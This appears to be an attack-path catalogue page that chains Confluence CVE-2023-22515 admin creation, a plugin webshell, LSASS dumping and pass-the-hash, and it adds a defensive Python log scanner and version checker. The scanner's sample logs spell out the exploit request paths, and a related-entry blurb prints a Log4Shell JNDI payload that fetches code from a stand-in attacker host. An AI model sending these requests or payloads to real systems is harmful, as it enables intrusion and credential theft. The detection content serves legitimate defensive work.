Unpatched Confluence (CVE-2023-22515) → internal foothold
Internal Confluence instance reachable from the corporate VLAN. The broken-access-control bug (CVE-2023-22515) lets an unauthenticated request re-open the setup flow and create an administrator account; a malicious plugin is then uploaded as a webshell, LSASS on the host gives up service-account hashes, and those are replayed to pivot into AD.
§ Context
Assumed environment: foothold on the corporate LAN. Confluence Server / Data Center reachable internally and not patched for the 2023 broken-access-control bug (affected: 8.0.0 through 8.3.2, 8.4.0 through 8.4.2, 8.5.0 and 8.5.1; fixed in 8.3.3, 8.4.3 and 8.5.2; releases before 8.0.0 are not affected).
§ Steps
- 01 Find Confluence on internal network [Discovery] N-NMAP-INTERNAL: Internal Nmap Sweep
- 02 Identify vulnerable version [Reconnaissance] W-RECON-FINGERPRINT: Tech Stack Fingerprinting
- 03 Create admin via /setup-* endpoint [Initial Access] SAAS-ATLAS-CVE: Atlassian Confluence / Jira RCE
- 04 Upload malicious plugin → webshell [Persistence] W-WEBSHELL: Webshell Deployment
- 05 Dump LSASS for service account [Credential Access] W-LSASS-PROCDUMP: LSASS via procdump / comsvcs.dll
- 06 Pivot to AD via captured creds [Lateral Movement] T1550.002: Pass the Hash
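The two checks a defender (or a pentester confirming scope) wants for the Confluence steps above, as an added example that is not part of the original dossier or of any Atlassian tooling: a version comparison against the affected ranges in Atlassian's advisory, extraction of the version from the `ajs-version-number` meta tag Confluence stamps into its pages (the fingerprint behind step 02), and a scan of access-log lines for the traces steps 03 and 04 leave (a `setupComplete` reset, a hit on a `/setup/*.action` endpoint on an installed instance, a plugin upload through the UPM REST endpoint). The HTML snippet and log lines are constructed for the example; the combined-log-format field order is an assumption about how the target's Tomcat access log is configured.

```python
"""Offline checks for the CVE-2023-22515 attack path (added example, not
original dossier code).  Sample HTML and log lines are constructed."""
import re
from typing import Optional
from urllib.parse import unquote

# Affected version ranges (inclusive) per Atlassian's advisory; each train
# was fixed in the release named in the comment.  Pre-8.0 and 8.6+ are clean.
AFFECTED = [
    ((8, 0, 0), (8, 3, 2)),  # fixed in 8.3.3
    ((8, 4, 0), (8, 4, 2)),  # fixed in 8.4.3
    ((8, 5, 0), (8, 5, 1)),  # fixed in 8.5.2
]

# Confluence emits this tag in the <head> of every page, including /login.action
VERSION_META = re.compile(
    r'<meta\s+name="ajs-version-number"\s+content="([^"]+)"', re.IGNORECASE)

# Combined-log-format line (assumed layout): src ident user [time] "METHOD path HTTP/x" status
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def parse_version(version: str) -> tuple:
    """'8.5.1' -> (8, 5, 1); a missing patch component is treated as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised Confluence version: {version!r}")
    return tuple(int(part or 0) for part in m.groups())


def is_vulnerable(version: str) -> bool:
    """True when the version falls inside one of the affected ranges."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED)


def extract_version(page_html: str) -> Optional[str]:
    """Step 02 fingerprint: read the version Confluence puts in its own markup."""
    m = VERSION_META.search(page_html)
    return m.group(1) if m else None


def classify_request(method: str, raw_path: str) -> Optional[str]:
    """Map one request to an indicator of steps 03/04, or None when benign."""
    path = unquote(raw_path)  # the parameter name may arrive URL-encoded
    if "bootstrapStatusProvider.applicationConfig.setupComplete" in path:
        return "setupComplete reset (re-opens the setup wizard)"
    if path.startswith("/setup/") and ".action" in path:
        return "setup endpoint hit on an already-installed instance"
    if method == "POST" and path.startswith("/rest/plugins/1.0/"):
        return "plugin upload via the UPM REST endpoint"
    return None


def scan_access_log(lines) -> list:
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the expected layout; skip it
        indicator = classify_request(m["method"], m["path"])
        if indicator:
            findings.append({"src": m["src"], "user": m["user"],
                             "path": m["path"], "indicator": indicator})
    return findings


# --- constructed sample data (not captured from a real system) ----------
SAMPLE_LOGIN_HTML = (
    '<html><head><title>Log In - Confluence</title>'
    '<meta name="ajs-version-number" content="8.5.1">'
    '</head><body></body></html>')

SAMPLE_LOG = [
    '10.20.30.40 - - [04/Oct/2023:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 5120',
    '10.20.30.40 - - [04/Oct/2023:10:01:05 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 302 0',
    '10.20.30.40 - - [04/Oct/2023:10:01:09 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0',
    '10.20.30.40 - admin2 [04/Oct/2023:10:02:30 +0000] "POST /rest/plugins/1.0/?token=abcd1234 HTTP/1.1" 202 310',
    '10.0.0.7 - jdoe [04/Oct/2023:10:03:00 +0000] "GET /display/ENG/Runbook HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    ver = extract_version(SAMPLE_LOGIN_HTML)
    print(f"fingerprinted version {ver}: vulnerable={is_vulnerable(ver)}")
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['src']} {f['user']:>6} {f['indicator']}: {f['path']}")
```

Run against real data by feeding the login page body to `extract_version` and the Tomcat access log to `scan_access_log`; any finding on an instance that finished setup long ago, or any `/setup/` hit at all from a client that is not an administrator's workstation, is worth an immediate check of the `confluence-administrators` group for accounts nobody created.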
§ References
- T1550.002: Pass the Hash (MITRE ATT&CK)
§ Frequently asked
- What is the "Unpatched Confluence (CVE-2023-22515) → internal foothold" attack path?
- Internal Confluence instance reachable from the corporate VLAN. The broken-access-control bug (CVE-2023-22515) lets an unauthenticated request re-open the setup flow and create an administrator account; a malicious plugin is then uploaded as a webshell, LSASS on the host gives up service-account hashes, and those are replayed to pivot into AD. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Find Confluence on internal network (N-NMAP-INTERNAL), a discovery primitive: an internal Nmap sweep for the Confluence web port. Assumed environment: foothold on the corporate LAN; the attacker already has a host inside the corporate VLAN but no Confluence credentials.
- What is the final impact of this kill-chain?
- The final step is Pivot to AD via captured creds (T1550.002), which falls under Lateral Movement: hashes dumped from LSASS on the Confluence host are replayed against other domain systems. From here, an operator typically moves on to domain privilege escalation or establishes persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. The decisive control is patching Confluence to 8.3.3, 8.4.3, 8.5.2 or later (or, until then, blocking access to /setup/* at the reverse proxy, as Atlassian's advisory recommends). For the exploitation step, Atlassian's advisory points to unexpected members of the confluence-administrators group, unexpected newly created user accounts, and requests to /setup/*.action in the access log. The webshell step shows up as an unplanned plugin install in the UPM audit trail; the credential step is caught by LSASS-access telemetry (procdump or comsvcs.dll touching lsass.exe); for the pass-the-hash step, see the ATT&CK entry T1550.002 under "References", which lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- ProxyLogon → webshell on Exchange → DA (shared techniques: 3)
  Unauth SSRF + auth bypass against on-prem Exchange (CAS) — write a webshell as SYSTEM on the Exchange server, dump LSASS for cached domain creds, pivot to DA.
- ProxyShell → SYSTEM on Exchange → DA (shared techniques: 3)
  Pre-auth ProxyShell chain (path confusion + EWS email-to-PowerShell + arbitrary file write) deploys a webshell as SYSTEM. Same post-exploitation as ProxyLogon.
- Jenkins /script Groovy console → RCE → AD (shared techniques: 3)
  Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access.
- MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p) (shared techniques: 2)
  Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.
- EternalBlue (MS17-010) → SMBv1 wormable spread (shared techniques: 2)
  Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- Log4Shell (CVE-2021-44228) → RCE → lateral (shared techniques: 2)
  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.